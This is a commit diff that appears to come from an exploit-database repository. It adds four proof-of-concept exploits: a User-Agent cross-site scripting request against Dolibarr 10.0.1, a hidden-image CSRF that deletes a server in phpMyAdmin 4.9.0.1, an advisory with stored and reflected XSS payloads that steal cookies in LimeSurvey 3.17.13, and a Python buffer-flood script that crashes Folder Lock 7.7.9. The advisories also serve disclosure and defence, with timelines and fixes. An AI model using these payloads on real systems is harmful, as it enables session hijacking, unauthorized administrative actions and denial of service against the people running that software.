DB: 2019-09-14
4 changes to exploits/shellcodes Folder Lock 7.7.9 - Denial of Service Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery LimeSurvey 3.17.13 - Cross-Site Scripting
This commit is contained in:
parent
c0ce31079a
commit
d154146052
5 changed files with 277 additions and 0 deletions
20
exploits/php/webapps/47384.txt
Normal file
20
exploits/php/webapps/47384.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
|
||||
Site Scripting
|
||||
# Exploit Author: Metin Yunus Kandemir (kandemir)
|
||||
# Vendor Homepage: https://www.dolibarr.org/
|
||||
# Software Link: https://www.dolibarr.org/downloads
|
||||
# Version: 10.0.1
|
||||
# Category: Webapps
|
||||
# Tested on: Xampp for Linux
|
||||
# CVE: CVE-2019-16197
|
||||
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
|
||||
software package to manage your business...
|
||||
==================================================================
|
||||
|
||||
Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
|
||||
the User-Agent HTTP header is copied into the HTML document as plain text
|
||||
between tags, leading to XSS.
|
||||
|
||||
GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
|
79
exploits/php/webapps/47385.txt
Normal file
79
exploits/php/webapps/47385.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
=============================================
|
||||
MGC ALERT 2019-003
|
||||
- Original release date: June 13, 2019
|
||||
- Last revised: September 13, 2019
|
||||
- Discovered by: Manuel Garcia Cardenas
|
||||
- Severity: 4,3/10 (CVSS Base Score)
|
||||
- CVE-ID: CVE-2019-12922
|
||||
=============================================
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
phpMyAdmin is a free software tool written in PHP, intended to handle the
|
||||
administration of MySQL over the Web. phpMyAdmin supports a wide range of
|
||||
operations on MySQL and MariaDB.
|
||||
|
||||
III. DESCRIPTION
|
||||
-------------------------
|
||||
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
|
||||
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
|
||||
server in the Setup page.
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
-------------------------
|
||||
Exploit CSRF - Deleting main server
|
||||
|
||||
<p>Deleting Server 1</p>
|
||||
<img src="
|
||||
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
|
||||
style="display:none;" />
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
-------------------------
|
||||
The attacker can easily create a fake hyperlink containing the request that
|
||||
wants to execute on behalf the user,in this way making possible a CSRF
|
||||
attack due to the wrong use of HTTP method.
|
||||
|
||||
VI. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
phpMyAdmin <= 4.9.0.1
|
||||
|
||||
VII. SOLUTION
|
||||
-------------------------
|
||||
Implement in each call the validation of the token variable, as already
|
||||
done in other phpMyAdmin requests.
|
||||
|
||||
VIII. REFERENCES
|
||||
-------------------------
|
||||
https://www.phpmyadmin.net/
|
||||
|
||||
IX. CREDITS
|
||||
-------------------------
|
||||
This vulnerability has been discovered and reported
|
||||
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
|
||||
|
||||
X. REVISION HISTORY
|
||||
-------------------------
|
||||
June 13, 2019 1: Initial release
|
||||
September 13, 2019 2: Last revision
|
||||
|
||||
XI. DISCLOSURE TIMELINE
|
||||
-------------------------
|
||||
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||
June 13, 2019 2: Send to vendor
|
||||
July 16, 2019 3: New request to vendor without fix date
|
||||
September 13, 2019 4: Sent to lists
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
|
||||
XIII. ABOUT
|
||||
-------------------------
|
||||
Manuel Garcia Cardenas
|
||||
Pentester
|
146
exploits/php/webapps/47386.txt
Normal file
146
exploits/php/webapps/47386.txt
Normal file
|
@ -0,0 +1,146 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
|
||||
=======================================================================
|
||||
title: Stored and reflected XSS vulnerabilities
|
||||
product: LimeSurvey
|
||||
vulnerable version: <= 3.17.13
|
||||
fixed version: =>3.17.14
|
||||
CVE number: CVE-2019-16172, CVE-2019-16173
|
||||
impact: medium
|
||||
homepage: https://www.limesurvey.org/
|
||||
found: 2019-08-23
|
||||
by: Andreas Kolbeck (Office Munich)
|
||||
David Haintz (Office Vienna)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Europe | Asia | North America
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"LimeSurvey is the tool to use for your online surveys. Whether you are
|
||||
conducting simple questionnaires with just a couple of questions or advanced
|
||||
assessments with conditionals and quota management, LimeSurvey has got you
|
||||
covered. LimeSurvey is 100% open source and will always be transparently developed.
|
||||
We can help you reach your goals."
|
||||
|
||||
Source: https://www.limesurvey.org/
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
LimeSurvey suffered from a vulnerability due to improper input
|
||||
and output validation. By exploiting this vulnerability an attacker could:
|
||||
1. Attack other users of the web application with JavaScript code,
|
||||
browser exploits or Trojan horses, or
|
||||
2. perform unauthorized actions in the name of another logged-in user.
|
||||
|
||||
The vendor provides a patch which should be installed immediately.
|
||||
Furthermore, a thorough security analysis is highly recommended as only a
|
||||
short spot check has been performed and additional issues are to be expected.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1) Stored and reflected XSS vulnerabilities
|
||||
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
|
||||
which allows an attacker to execute JavaScript code with the permissions of the victim.
|
||||
In this way it is possible to escalate privileges from a low-privileged account e.g.
|
||||
to "SuperAdmin".
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) Stored and reflected XSS vulnerabilities
|
||||
Example 1 - Stored XSS (CVE-2019-16172):
|
||||
The attacker needs the appropriate permissions in order to create new survey groups.
|
||||
Then create a survey group with a JavaScript payload in the title, for example:
|
||||
|
||||
test<svg/onload=alert(document.cookie)>
|
||||
|
||||
When the survey group is being deleted, e.g. by an administrative user, the JavaScript
|
||||
code will be executed as part of the "success" message.
|
||||
|
||||
|
||||
Example 2 - Reflected XSS (CVE-2019-16173):
|
||||
The following proof of concept prints the current CSRF token cookie which contains the
|
||||
CSRF token. The parameter "surveyid" is not filtered properly:
|
||||
|
||||
http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
|
||||
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
|
||||
|
||||
|
||||
If the URL schema is configured differently the following payload works:
|
||||
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
|
||||
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
|
||||
version 3.17.13. It is assumed that older versions are affected as well.
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
|
||||
2019-09-02: Fixes available:
|
||||
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
|
||||
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
|
||||
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
|
||||
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
|
||||
2019-09-12: Coordinated release of security advisory
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Update to version 3.17.15 or higher:
|
||||
https://www.limesurvey.org/stable-release
|
||||
|
||||
The vendor provides a detailed list of changes here:
|
||||
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
No workaround available.
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Europe | Asia | North America
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/career/index.html
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/contact/index.html
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Mail: research at sec-consult dot com
|
||||
Web: https://www.sec-consult.com
|
||||
Blog: http://blog.sec-consult.com
|
||||
Twitter: https://twitter.com/sec_consult
|
||||
|
||||
EOF A. Kolbeck / @2019
|
28
exploits/windows/dos/47383.py
Executable file
28
exploits/windows/dos/47383.py
Executable file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
|
||||
# Date: 12.09.2019
|
||||
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
|
||||
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
|
||||
# Exploit Author: Achilles
|
||||
# Tested Version: 7.7.9
|
||||
# Tested on: Windows 7 x64
|
||||
|
||||
|
||||
# 1.- Run python code :Folder_Lock.py
|
||||
# 2.- Open EVIL.txt and copy content to clipboard
|
||||
# 3.- Open Folderlock and Click 'Enter Key'
|
||||
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
|
||||
# 5.- Click 'Submit' and you will see a crash.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/env python
|
||||
buffer = "\x41" * 6000
|
||||
|
||||
try:
|
||||
f=open("Evil.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
|
@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port
|
|||
47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
|
||||
47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
|
||||
47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
|
||||
47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port
|
|||
47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
|
||||
47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
|
||||
47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
|
||||
47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
|
||||
47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
|
||||
47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue